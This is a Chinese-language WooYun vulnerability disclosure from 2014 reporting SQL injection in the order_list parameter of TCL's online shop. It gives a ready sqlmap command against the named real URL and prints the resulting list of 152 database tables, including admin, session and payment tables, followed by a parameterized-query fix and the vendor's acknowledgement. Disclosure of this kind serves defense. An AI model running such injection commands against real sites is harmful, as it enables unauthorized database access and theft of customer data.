当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-077808

漏洞标题:TCL系列3:某核心站点SQL注入

相关厂商:TCL官方网上商城

漏洞作者: Eoh

提交时间:2014-09-30 11:41

修复时间:2014-11-14 11:42

公开时间:2014-11-14 11:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-30: 细节已通知厂商并且等待厂商处理中
2014-09-30: 厂商已经确认,细节仅向厂商公开
2014-10-10: 细节向核心白帽子及相关领域专家公开
2014-10-20: 细节向普通白帽子公开
2014-10-30: 细节向实习白帽子公开
2014-11-14: 细节向公众公开

简要描述:

详细说明:

未对用户输入正确执行危险字符清理

漏洞证明:

存在问题参数order_list
python sqlmap.py -u "http://shop.tcl.com/mall/goods/index.html?attrs_216=541&cat_id=20&order_list=*&porder=stb" --dbs

Database: shoptcl
[152 tables]
+------------------------------+
| base_generate_number         |
| c_goods_spec_index_0916      |
| ec_brand                     |
| ec_brand_category            |
| ec_bulk_purchase             |
| ec_cart                      |
| ec_category_spec             |
| ec_category_spec_value       |
| ec_comment                   |
| ec_comment_image             |
| ec_consultation              |
| ec_coupons                   |
| ec_coupons_goods             |
| ec_coupons_use_detail        |
| ec_custom_cat_menu           |
| ec_evaluate                  |
| ec_evaluate_detail           |
| ec_fenxiao_account           |
| ec_fenxiao_copywritten       |
| ec_fenxiao_fans_contact      |
| ec_fenxiao_goods             |
| ec_fenxiao_income_detail     |
| ec_fenxiao_income_use_detail |
| ec_fenxiao_level             |
| ec_fenxiao_order             |
| ec_fenxiao_order_item        |
| ec_fenxiao_product           |
| ec_fenxiao_share             |
| ec_fenxiao_share_stat        |
| ec_fenxiao_shop_rela         |
| ec_fenxiao_user              |
| ec_fenxiao_user_audit        |
| ec_fenxiao_user_cust         |
| ec_fenxiao_withdraw          |
| ec_freight_tpl               |
| ec_freight_tpl_area          |
| ec_freight_tpl_detail        |
| ec_goods                     |
| ec_goods_collocation         |
| ec_goods_custom_cat          |
| ec_goods_gift                |
| ec_goods_image               |
| ec_goods_mapping             |
| ec_goods_pkg                 |
| ec_goods_pkg_detail          |
| ec_goods_pkg_image           |
| ec_goods_relation            |
| ec_goods_set                 |
| ec_goods_set_detail          |
| ec_goods_spec_index          |
| ec_group_purchase_item       |
| ec_inventory_occupy_detail   |
| ec_logistics_info            |
| ec_logistics_tracking        |
| ec_order                     |
| ec_order_discount            |
| ec_order_item                |
| ec_order_log                 |
| ec_order_msg_log             |
| ec_order_refund              |
| ec_order_refund_log          |
| ec_payment                   |
| ec_payment_cfg               |
| ec_product                   |
| ec_product_sku_rela          |
| ec_product_sku_rela_0918     |
| ec_promotion                 |
| ec_promotion_discount        |
| ec_promotion_integral        |
| ec_promotion_present         |
| ec_promotion_reduce          |
| ec_promotion_seckill         |
| ec_push_msg                  |
| ec_search_keword             |
| ec_search_keyword            |
| ec_search_log                |
| ec_search_rela_keword        |
| ec_search_weight_adjust      |
| ec_search_weight_rule        |
| ec_service_policy            |
| ec_shop                      |
| ec_shop_category             |
| ec_shop_sub_account          |
| ec_spec                      |
| ec_spec_value                |
| ec_store                     |
| ec_store_cover               |
| ec_store_inventory           |
| ec_store_sku                 |
| ec_transfer_account          |
| ec_user_favorite             |
| ec_user_history              |
| esb_app_info                 |
| esb_app_permission           |
| esb_msg_data                 |
| esb_msg_que                  |
| esb_service                  |
| esb_service_api              |
| ro_resource                  |
| ro_role                      |
| ro_role_priv                 |
| ro_seller_log                |
| ro_seller_menu               |
| ro_subacct_role              |
| ro_user                      |
| ro_user_address              |
| sys_access_log               |
| sys_admin                    |
| sys_admin_log                |
| sys_admin_role               |
| sys_admin_role_priv          |
| sys_article                  |
| sys_caches                   |
| sys_category                 |
| sys_custom_category          |
| sys_dict                     |
| sys_dict_type                |
| sys_district                 |
| sys_email_verify_code        |
| sys_feedback                 |
| sys_file                     |
| sys_file_server              |
| sys_file_type                |
| sys_image_thumbrule          |
| sys_meta                     |
| sys_object_file              |
| sys_point_rule               |
| sys_position                 |
| sys_position_data            |
| sys_position_keyword         |
| sys_position_space           |
| sys_poster                   |
| sys_poster_click             |
| sys_poster_space             |
| sys_reg_invite               |
| sys_resource                 |
| sys_role                     |
| sys_session                  |
| sys_setting                  |
| sys_sms_sendlist             |
| sys_sms_templates            |
| sys_sms_verify_code          |
| sys_template                 |
| sys_template_type            |
| sys_user_point               |
| sys_user_point_detail        |
| sys_user_point_use_detail    |
| sys_user_rank                |
| sys_widget_callset           |
| sys_widget_template          |
| sys_widget_type              |
| tmp_0916                     |
+------------------------------+

修复方案:

参数化SQL语句

版权声明:转载请注明来源 Eoh@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-09-30 11:42

厂商回复:

感谢您的关注,已转交相关单位处理。

最新状态:

暂无